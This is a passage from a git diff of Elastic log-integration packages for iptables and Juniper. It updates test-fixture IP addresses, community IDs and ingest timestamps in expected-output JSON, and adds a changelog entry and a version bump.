"MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0", + "message": "MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6BwNFzns3BNljtYZJCwhPO5Qoq0=", + "community_id": "1:6eLXxu4ppPpoPmb/0UoBhdMHrBQ=", "transport": "tcp" }, "observer": { @@ -210,13 +228,13 @@ "related": { "ip": [ "192.168.110.116", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "drop", - "ingested": "2021-06-15T20:04:38.320855475Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0", + "ingested": "2021-12-09T13:39:44.256966Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0", "type": [ "denied", "connection" @@ -255,7 +273,7 @@ "destination": { "port": 1443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "WAN_OUT", @@ -266,13 +284,13 @@ "mac": "90:10:65:29:b6:2a", "ip": "192.168.110.116" }, - "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0", + "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6BwNFzns3BNljtYZJCwhPO5Qoq0=", + "community_id": "1:6eLXxu4ppPpoPmb/0UoBhdMHrBQ=", "transport": "tcp" }, "observer": { @@ -285,13 +303,13 @@ "related": { "ip": [ "192.168.110.116", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:38.320863506Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0", + "ingested": "2021-12-09T13:39:44.256969400Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "allowed", "connection" @@ -330,7 +348,7 @@ "destination": { "port": 1443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "WAN_OUT", @@ -341,13 +359,13 @@ "mac": "90:10:65:29:b6:2a", "ip": "192.168.110.116" }, - "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0", + "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6BwNFzns3BNljtYZJCwhPO5Qoq0=", + "community_id": "1:6eLXxu4ppPpoPmb/0UoBhdMHrBQ=", "transport": "tcp" }, "observer": { @@ -360,13 +378,13 @@ "related": { "ip": [ "192.168.110.116", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:38.320866951Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0", + "ingested": "2021-12-09T13:39:44.256973800Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0", "type": [ "allowed", "connection" @@ -411,7 +429,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-06-15T20:04:38.320869594Z", + "ingested": "2021-12-09T13:39:44.256978900Z", "original": "May 5 20:46:45 My-Office-Gateway user.info kernel: TTL=126 ID=15317 DF PROTO=TCP SPT=59344 DPT=443 WINDOW=8212 RES=0x00 ACK PSH URGP=0", "category": [ "network" @@ -453,7 +471,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-06-15T20:04:38.320872209Z", + "ingested": "2021-12-09T13:39:44.256983800Z", "original": "May 5 20:46:46 My-Office-Gateway user.info kernel: TTL=126 ID=51392 DF PROTO=TCP SPT=51653 DPT=7914 WINDOW=1024 RES=0x00 ACK PSH URGP=0", "category": [ "network" @@ -494,7 +512,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-06-15T20:04:38.320874900Z", + "ingested": "2021-12-09T13:39:44.256987700Z", "original": "May 5 20:46:46 My-Office-Gateway user.info kernel: L=126 ID=8698 DF PROTO=TCP SPT=88 DPT=51179 WINDOW=2053 RES=0x00 ACK URGP=0", "category": [ "network" @@ -536,7 +554,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-06-15T20:04:38.320883074Z", + "ingested": "2021-12-09T13:39:44.256992200Z", "original": "May 5 20:47:09 My-Office-Gateway user.info kernel: 0 TTL=126 ID=15461 DF PROTO=TCP SPT=59289 DPT=443 WINDOW=8208 RES=0x00 ACK PSH URGP=0", "category": [ "network" @@ -577,7 +595,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-06-15T20:04:38.320885826Z", + "ingested": "2021-12-09T13:39:44.256996700Z", "original": "May 5 20:46:56 My-Office-Gateway user.info kernel: L=126 ID=8702 DF PROTO=TCP SPT=88 DPT=51182 WINDOW=2053 RES=0x00 ACK URGP=0", "category": [ "network" @@ -620,7 +638,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-06-15T20:04:38.320888483Z", + "ingested": "2021-12-09T13:39:44.257000500Z", "original": "May 5 20:45:44 My-Office-Gateway user.info kernel: TL=126 ID=4622 DF PROTO=TCP SPT=389 DPT=49209 WINDOW=8192 RES=0x00 ECE ACK SYN URGP=0", "category": [ "network" diff --git a/packages/iptables/manifest.yml b/packages/iptables/manifest.yml index 5cad44e3c23..2a29abe83af 100644 --- a/packages/iptables/manifest.yml +++ b/packages/iptables/manifest.yml @@ -1,6 +1,6 @@ name: iptables title: Iptables Logs -version: 0.6.0 +version: 0.6.1 release: experimental description: Collect and parse logs from iptables and ip6tables with Elastic Agent. type: integration diff --git a/packages/juniper/_dev/deploy/docker/sample_logs/juniper-srx.log b/packages/juniper/_dev/deploy/docker/sample_logs/juniper-srx.log index 38c0e516592..253d25cb005 100644 --- a/packages/juniper/_dev/deploy/docker/sample_logs/juniper-srx.log +++ b/packages/juniper/_dev/deploy/docker/sample_logs/juniper-srx.log @@ -1,2 +1,2 @@ -<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address="192.168.1.100" source-port="58071" destination-address="103.235.46.39" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] -<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address="192.168.1.100" source-port="58071" destination-address="67.43.156.13" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] +<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] diff --git a/packages/juniper/changelog.yml b/packages/juniper/changelog.yml index 7431c6efa40..0d92fd3d432 100644 --- a/packages/juniper/changelog.yml +++ b/packages/juniper/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.6" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.0.5" changes: - description: Deprecate in favor of new specific packages diff --git a/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json b/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json index e4a57e873cc..fba6e68bbbe 100644 --- a/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json @@ -3,7 +3,7 @@ { "message": "Jan 29 06:09:59 ceroinBC.exe[6713]: RPD_SCHED_TASK_LONGRUNTIME: : exe ran for 7309(5049)", "event": { - "ingested": "2021-12-06T12:25:15.833781878Z" + "ingested": "2021-12-10T10:13:45.067851400Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "Feb 12 13:12:33 DCD_FILTER_LIB_ERROR message repeated [7608]: llu: Filter library initialization failed", "event": { - "ingested": "2021-12-06T12:25:15.833807005Z" + "ingested": "2021-12-10T10:13:45.067872Z" }, "ecs": { "version": "1.12.0" @@ -27,7 +27,7 @@ { "message": "Feb 26 20:15:08 MIB2D_TRAP_SEND_FAILURE: restart [6747]: sum: uaerat: cancel: success", "event": { - "ingested": "2021-12-06T12:25:15.833814229Z" + "ingested": "2021-12-10T10:13:45.067881900Z" }, "ecs": { "version": "1.12.0" @@ -39,7 +39,7 @@ { "message": "Mar 12 03:17:42 seq olorema6148.www.localdomain: fug5500.www.domain IFP trace\u003e node: dqu", "event": { - "ingested": "2021-12-06T12:25:15.833819378Z" + "ingested": "2021-12-10T10:13:45.067891500Z" }, "ecs": { "version": "1.12.0" @@ -51,7 +51,7 @@ { "message": "Mar 26 10:20:16 ssb SNMPD_CONTEXT_ERROR: [7400]: emq: isiu: success in 6237 context 5367", "event": { - "ingested": "2021-12-06T12:25:15.833824047Z" + "ingested": "2021-12-10T10:13:45.067900900Z" }, "ecs": { "version": "1.12.0" @@ -63,7 +63,7 @@ { "message": "Apr 9 17:22:51 RPD_KRT_IFL_CELL_RELAY_MODE_UNSPECIFIED: restart [7618]: ionul: ifl : nibus, unknown", "event": { - "ingested": "2021-12-06T12:25:15.833848894Z" + "ingested": "2021-12-10T10:13:45.067910Z" }, "ecs": { "version": "1.12.0" @@ -75,7 +75,7 @@ { "message": "Apr 24 00:25:25 CHASSISD_SNMP_TRAP10 message repeated [1284]: ume: SNMP trap: failure: ono", "event": { - "ingested": "2021-12-06T12:25:15.833858041Z" + "ingested": "2021-12-10T10:13:45.067919200Z" }, "ecs": { "version": "1.12.0" @@ -87,7 +87,7 @@ { "message": "May 8 07:27:59 sunt prehen6218.www.localhost: onse.exe[254]: RPD_KRT_IFL_CELL_RELAY_MODE_INVALID: : ifl : inibusBo, failure", "event": { - "ingested": "2021-12-06T12:25:15.833863651Z" + "ingested": "2021-12-10T10:13:45.067928300Z" }, "ecs": { "version": "1.12.0" @@ -99,7 +99,7 @@ { "message": "May 22 14:30:33 iamquis quirat6972.www5.lan: isc.exe[3237]: SNMPD_USER_ERROR: : conseq: unknown in 6404 user 'atiset' 4068", "event": { - "ingested": "2021-12-06T12:25:15.833868591Z" + "ingested": "2021-12-10T10:13:45.067937600Z" }, "ecs": { "version": "1.12.0" @@ -111,7 +111,7 @@ { "message": "Jun 5 21:33:08 fpc9 RPD_TASK_REINIT: [4621]: lita: Reinitializing", "event": { - "ingested": "2021-12-06T12:25:15.833873209Z" + "ingested": "2021-12-10T10:13:45.067943700Z" }, "ecs": { "version": "1.12.0" @@ -123,7 +123,7 @@ { "message": "Jun 20 04:35:42 fpc4 LOGIN_FAILED: [2227]: oinBC: Login failed for user quameius from host ipsumdol4488.api.localdomain", "event": { - "ingested": "2021-12-06T12:25:15.833877377Z" + "ingested": "2021-12-10T10:13:45.067950200Z" }, "ecs": { "version": "1.12.0" @@ -135,7 +135,7 @@ { "message": "Jul 4 11:38:16 NASD_PPP_SEND_PARTIAL: restart [3994]: aper: Unable to send all of message: santiumd", "event": { - "ingested": "2021-12-06T12:25:15.833881635Z" + "ingested": "2021-12-10T10:13:45.067960Z" }, "ecs": { "version": "1.12.0" @@ -147,7 +147,7 @@ { "message": "Jul 18 18:40:50 UI_COMMIT_AT_FAILED message repeated [7440]: temqu: success, minimav", "event": { - "ingested": "2021-12-06T12:25:15.833885813Z" + "ingested": "2021-12-10T10:13:45.067969400Z" }, "ecs": { "version": "1.12.0" @@ -159,7 +159,7 @@ { "message": "Aug 2 01:43:25 rnatur ofdeFin7811.lan: emipsumd.exe[5020]: BOOTPD_NEW_CONF: : New configuration installed", "event": { - "ingested": "2021-12-06T12:25:15.833915318Z" + "ingested": "2021-12-10T10:13:45.067978700Z" }, "ecs": { "version": "1.12.0" @@ -171,7 +171,7 @@ { "message": "Aug 16 08:45:59 RPD_RIP_JOIN_MULTICAST message repeated [60]: onemulla: Unable to join multicast group enp0s4292: unknown", "event": { - "ingested": "2021-12-06T12:25:15.833932050Z" + "ingested": "2021-12-10T10:13:45.067988100Z" }, "ecs": { "version": "1.12.0" @@ -183,7 +183,7 @@ { "message": "Aug 30 15:48:33 FSAD_TERMINATED_CONNECTION: restart [6703]: xea: Open file ites` closed due to unknown", "event": { - "ingested": "2021-12-06T12:25:15.833939193Z" + "ingested": "2021-12-10T10:13:45.067994600Z" }, "ecs": { "version": "1.12.0" @@ -195,7 +195,7 @@ { "message": "Sep 13 22:51:07 RPD_KRT_IFL_GENERATION message repeated [5539]: eri: ifl lo2169 generation mismatch -- unknown", "event": { - "ingested": "2021-12-06T12:25:15.833944814Z" + "ingested": "2021-12-10T10:13:45.068001300Z" }, "ecs": { "version": "1.12.0" @@ -207,7 +207,7 @@ { "message": "Sep 28 05:53:42 cfeb UI_COMMIT_ROLLBACK_FAILED: [3453]: avolu: Automatic rollback failed", "event": { - "ingested": "2021-12-06T12:25:15.833949623Z" + "ingested": "2021-12-10T10:13:45.068018400Z" }, "ecs": { "version": "1.12.0" @@ -219,7 +219,7 @@ { "message": "Oct 12 12:56:16 mquisn.exe[3993]: RMOPD_usage : failure: midest", "event": { - "ingested": "2021-12-06T12:25:15.833953811Z" + "ingested": "2021-12-10T10:13:45.068028Z" }, "ecs": { "version": "1.12.0" @@ -231,7 +231,7 @@ { "message": "Oct 26 19:58:50 undeomni.exe[4938]: RPD_ISIS_LSPCKSUM: : IS-IS 715 LSP checksum error, interface enp0s1965, LSP id tasun, sequence 3203, checksum eratv, lifetime ipsa", "event": { - "ingested": "2021-12-06T12:25:15.833958129Z" + "ingested": "2021-12-10T10:13:45.068037100Z" }, "ecs": { "version": "1.12.0" @@ -243,7 +243,7 @@ { "message": "Nov 10 03:01:24 kmd: restart ", "event": { - "ingested": "2021-12-06T12:25:15.833962337Z" + "ingested": "2021-12-10T10:13:45.068046400Z" }, "ecs": { "version": "1.12.0" @@ -255,7 +255,7 @@ { "message": "Nov 24 10:03:59 ever.exe[6463]: LOGIN_FAILED: : Login failed for user atq from host erspi4926.www5.test", "event": { - "ingested": "2021-12-06T12:25:15.833966504Z" + "ingested": "2021-12-10T10:13:45.068055500Z" }, "ecs": { "version": "1.12.0" @@ -267,7 +267,7 @@ { "message": "Dec 8 17:06:33 CHASSISD_MBUS_ERROR message repeated [72]: iadese: nisiu imad: management bus failed sanity test", "event": { - "ingested": "2021-12-06T12:25:15.833970822Z" + "ingested": "2021-12-10T10:13:45.068064400Z" }, "ecs": { "version": "1.12.0" @@ -279,7 +279,7 @@ { "message": "Dec 23 00:09:07 niamquis.exe[1471]: TFTPD_NAK_ERR : nak error ptatems, 357", "event": { - "ingested": "2021-12-06T12:25:15.833974750Z" + "ingested": "2021-12-10T10:13:45.068073800Z" }, "ecs": { "version": "1.12.0" @@ -291,7 +291,7 @@ { "message": "Jan 6 07:11:41 UI_DUPLICATE_UID: restart [3350]: atqu: Users naturau have the same UID olorsita", "event": { - "ingested": "2021-12-06T12:25:15.833978747Z" + "ingested": "2021-12-10T10:13:45.068082900Z" }, "ecs": { "version": "1.12.0" @@ -303,7 +303,7 @@ { "message": "Jan 20 14:14:16 piscivel.exe[4753]: TFTPD_CREATE_ERR: : check_space unknown", "event": { - "ingested": "2021-12-06T12:25:15.833983376Z" + "ingested": "2021-12-10T10:13:45.068092300Z" }, "ecs": { "version": "1.12.0" @@ -315,7 +315,7 @@ { "message": "Feb 3 21:16:50 fpc4 RPD_START: [1269]: riat: Start 181 version version built 7425", "event": { - "ingested": "2021-12-06T12:25:15.833987634Z" + "ingested": "2021-12-10T10:13:45.068101400Z" }, "ecs": { "version": "1.12.0" @@ -327,7 +327,7 @@ { "message": "Feb 18 04:19:24 fpc2 COSMAN: : uptasnul: delete class_to_ifl table 2069, ifl 3693", "event": { - "ingested": "2021-12-06T12:25:15.833991682Z" + "ingested": "2021-12-10T10:13:45.068110800Z" }, "ecs": { "version": "1.12.0" @@ -339,7 +339,7 @@ { "message": "Mar 4 11:21:59 orum oinBCSed3073.www.lan: ilm.exe[3193]: SNMPD_TRAP_QUEUE_MAX_ATTEMPTS: : fugiatqu: after 4003 attempts, deleting 4568 traps queued to exercita", "event": { - "ingested": "2021-12-06T12:25:15.833995539Z" + "ingested": "2021-12-10T10:13:45.068120300Z" }, "ecs": { "version": "1.12.0" @@ -351,7 +351,7 @@ { "message": "Mar 18 18:24:33 TFTPD_BIND_ERR: restart [1431]: ntut: bind: failure", "event": { - "ingested": "2021-12-06T12:25:15.833999346Z" + "ingested": "2021-12-10T10:13:45.068129Z" }, "ecs": { "version": "1.12.0" @@ -363,7 +363,7 @@ { "message": "Apr 2 01:27:07 lite ugia517.api.host: doei.exe[7073]: RPD_LDP_SESSIONDOWN: : LDP session 10.88.126.165 is down, failure", "event": { - "ingested": "2021-12-06T12:25:15.834003083Z" + "ingested": "2021-12-10T10:13:45.068132900Z" }, "ecs": { "version": "1.12.0" @@ -375,7 +375,7 @@ { "message": "Apr 16 08:29:41 fpc6 SNMPD_CONTEXT_ERROR: [180]: eturadip: ent: unknown in 5848 context 316", "event": { - "ingested": "2021-12-06T12:25:15.834007Z" + "ingested": "2021-12-10T10:13:45.068139Z" }, "ecs": { "version": "1.12.0" @@ -387,7 +387,7 @@ { "message": "Apr 30 15:32:16 NASD_CHAP_INVALID_CHAP_IDENTIFIER message repeated [796]: iumdo: lo2721: received aturv expected CHAP ID: ectetura", "event": { - "ingested": "2021-12-06T12:25:15.834010858Z" + "ingested": "2021-12-10T10:13:45.068148500Z" }, "ecs": { "version": "1.12.0" @@ -399,7 +399,7 @@ { "message": "May 14 22:34:50 UI_LOAD_EVENT message repeated [6342]: seq: User 'moll' is performing a 'allow'", "event": { - "ingested": "2021-12-06T12:25:15.834017971Z" + "ingested": "2021-12-10T10:13:45.068157900Z" }, "ecs": { "version": "1.12.0" @@ -411,7 +411,7 @@ { "message": "May 29 05:37:24 fdeFin.exe[4053]: SNMP_TRAP_TRACE_ROUTE_TEST_FAILED : traceRouteCtlOwnerIndex = 1450, traceRouteCtlTestName = edic", "event": { - "ingested": "2021-12-06T12:25:15.834022069Z" + "ingested": "2021-12-10T10:13:45.068166400Z" }, "ecs": { "version": "1.12.0" @@ -423,7 +423,7 @@ { "message": "Jun 12 12:39:58 SNMPD_RTSLIB_ASYNC_EVENT: restart [508]: uae: oremip: sequence mismatch failure", "event": { - "ingested": "2021-12-06T12:25:15.834025896Z" + "ingested": "2021-12-10T10:13:45.068172600Z" }, "ecs": { "version": "1.12.0" @@ -435,7 +435,7 @@ { "message": "Jun 26 19:42:33 tesse olupta2743.internal.localdomain: ine.exe[3181]: BOOTPD_TIMEOUT: : Timeout success unreasonable", "event": { - "ingested": "2021-12-06T12:25:15.834029713Z" + "ingested": "2021-12-10T10:13:45.068178900Z" }, "ecs": { "version": "1.12.0" @@ -447,7 +447,7 @@ { "message": "Jul 11 02:45:07 NASD_RADIUS_MESSAGE_UNEXPECTED message repeated [33]: abore: Unknown response from RADIUS server: unknown", "event": { - "ingested": "2021-12-06T12:25:15.834033520Z" + "ingested": "2021-12-10T10:13:45.068185800Z" }, "ecs": { "version": "1.12.0" @@ -459,7 +459,7 @@ { "message": "Jul 25 09:47:41 PWC_LOCKFILE_BAD_FORMAT: restart [3426]: illum: PID lock file has bad format: eprehe", "event": { - "ingested": "2021-12-06T12:25:15.834037107Z" + "ingested": "2021-12-10T10:13:45.068195100Z" }, "ecs": { "version": "1.12.0" @@ -471,7 +471,7 @@ { "message": "Aug 8 16:50:15 snostr.exe[1613]: RPD_KRT_AFUNSUPRT : tec: received itaspe message with unsupported address family 4176", "event": { - "ingested": "2021-12-06T12:25:15.834040774Z" + "ingested": "2021-12-10T10:13:45.068204100Z" }, "ecs": { "version": "1.12.0" @@ -483,7 +483,7 @@ { "message": "Aug 22 23:52:50 oreeufug.exe[6086]: PWC_PROCESS_FORCED_HOLD : Process plicaboN forcing hold down of child 619 until signal", "event": { - "ingested": "2021-12-06T12:25:15.834044371Z" + "ingested": "2021-12-10T10:13:45.068213200Z" }, "ecs": { "version": "1.12.0" @@ -495,7 +495,7 @@ { "message": "Sep 6 06:55:24 MIB2D_IFL_IFINDEX_FAILURE message repeated [4115]: tiu: SNMP index assigned to wri changed from 3902 to unknown", "event": { - "ingested": "2021-12-06T12:25:15.834048027Z" + "ingested": "2021-12-10T10:13:45.068222300Z" }, "ecs": { "version": "1.12.0" @@ -507,7 +507,7 @@ { "message": "Sep 20 13:57:58 mwr cia5990.api.localdomain: pitlabo.exe[3498]: UI_DBASE_MISMATCH_MAJOR: : Database header major version number mismatch for file 'ende': expecting 6053, got 4884", "event": { - "ingested": "2021-12-06T12:25:15.834051584Z" + "ingested": "2021-12-10T10:13:45.068231500Z" }, "ecs": { "version": "1.12.0" @@ -519,7 +519,7 @@ { "message": "Oct 4 21:00:32 iuntN utfugi851.www5.invalid: nul.exe[1005]: SNMPD_VIEW_INSTALL_DEFAULT: : eetdo: success installing default 1243 view 5146", "event": { - "ingested": "2021-12-06T12:25:15.834055171Z" + "ingested": "2021-12-10T10:13:45.068240600Z" }, "ecs": { "version": "1.12.0" @@ -531,7 +531,7 @@ { "message": "Oct 19 04:03:07 DCD_PARSE_STATE_EMERGENCY message repeated [2498]: uptatem: An unhandled state was encountered during interface parsing", "event": { - "ingested": "2021-12-06T12:25:15.834058667Z" + "ingested": "2021-12-10T10:13:45.068249800Z" }, "ecs": { "version": "1.12.0" @@ -543,7 +543,7 @@ { "message": "Nov 2 11:05:41 loremagn acons3820.internal.home: ain.exe[7192]: LOGIN_PAM_MAX_RETRIES: : Too many retries while authenticating user iquipex", "event": { - "ingested": "2021-12-06T12:25:15.834062394Z" + "ingested": "2021-12-10T10:13:45.068258800Z" }, "ecs": { "version": "1.12.0" @@ -555,7 +555,7 @@ { "message": "Nov 16 18:08:15 onorume.exe[3290]: BOOTPD_NO_BOOTSTRING : No boot string found for type veleu", "event": { - "ingested": "2021-12-06T12:25:15.834066121Z" + "ingested": "2021-12-10T10:13:45.068266900Z" }, "ecs": { "version": "1.12.0" @@ -567,7 +567,7 @@ { "message": "Dec 1 01:10:49 eirured sequamn5243.mail.home: sshd: sshd: SSHD_LOGIN_FAILED: Login failed for user 'ciatisun' from host '10.252.209.246'.", "event": { - "ingested": "2021-12-06T12:25:15.834069728Z" + "ingested": "2021-12-10T10:13:45.068270800Z" }, "ecs": { "version": "1.12.0" @@ -579,7 +579,7 @@ { "message": "Dec 15 08:13:24 COS: restart : Received FC-\u003eQ map, caecat", "event": { - "ingested": "2021-12-06T12:25:15.834073445Z" + "ingested": "2021-12-10T10:13:45.068276900Z" }, "ecs": { "version": "1.12.0" @@ -591,7 +591,7 @@ { "message": "Dec 29 15:15:58 cgatool message repeated : nvolupta: generated address is success", "event": { - "ingested": "2021-12-06T12:25:15.834077042Z" + "ingested": "2021-12-10T10:13:45.068282900Z" }, "ecs": { "version": "1.12.0" @@ -603,7 +603,7 @@ { "message": "Jan 12 22:18:32 CHASSISD_SNMP_TRAP6 message repeated [4667]: idolor: SNMP trap generated: success (les)", "event": { - "ingested": "2021-12-06T12:25:15.834080839Z" + "ingested": "2021-12-10T10:13:45.068290600Z" }, "ecs": { "version": "1.12.0" @@ -615,7 +615,7 @@ { "message": "Jan 27 05:21:06 ssb FLOW_REASSEMBLE_SUCCEED: : Packet merged source 10.102.228.136 destination 10.151.136.250 ipid upt succeed", "event": { - "ingested": "2021-12-06T12:25:15.834084726Z" + "ingested": "2021-12-10T10:13:45.068300Z" }, "ecs": { "version": "1.12.0" @@ -627,7 +627,7 @@ { "message": "Feb 10 12:23:41 DFWD_PARSE_FILTER_EMERGENCY message repeated [2037]: serrorsi: tsedquia encountered errors while parsing filter index file", "event": { - "ingested": "2021-12-06T12:25:15.834088373Z" + "ingested": "2021-12-10T10:13:45.068309200Z" }, "ecs": { "version": "1.12.0" @@ -639,7 +639,7 @@ { "message": "Feb 24 19:26:15 remips laboreet5949.mail.test: tesse.exe[4358]: RPD_LDP_SESSIONDOWN: : LDP session 10.148.255.126 is down, unknown", "event": { - "ingested": "2021-12-06T12:25:15.834092040Z" + "ingested": "2021-12-10T10:13:45.068318500Z" }, "ecs": { "version": "1.12.0" @@ -651,7 +651,7 @@ { "message": "Mar 11 02:28:49 fpc2 NASD_CHAP_REPLAY_ATTACK_DETECTED: [mipsumqu]: turad: eth680.6195: received doloremi unknown.iciatis", "event": { - "ingested": "2021-12-06T12:25:15.834095747Z" + "ingested": "2021-12-10T10:13:45.068327700Z" }, "ecs": { "version": "1.12.0" @@ -663,7 +663,7 @@ { "message": "Mar 25 09:31:24 rema mcol7795.domain: mquis lsys_ssam_handler: : processing lsys root-logical-system tur", "event": { - "ingested": 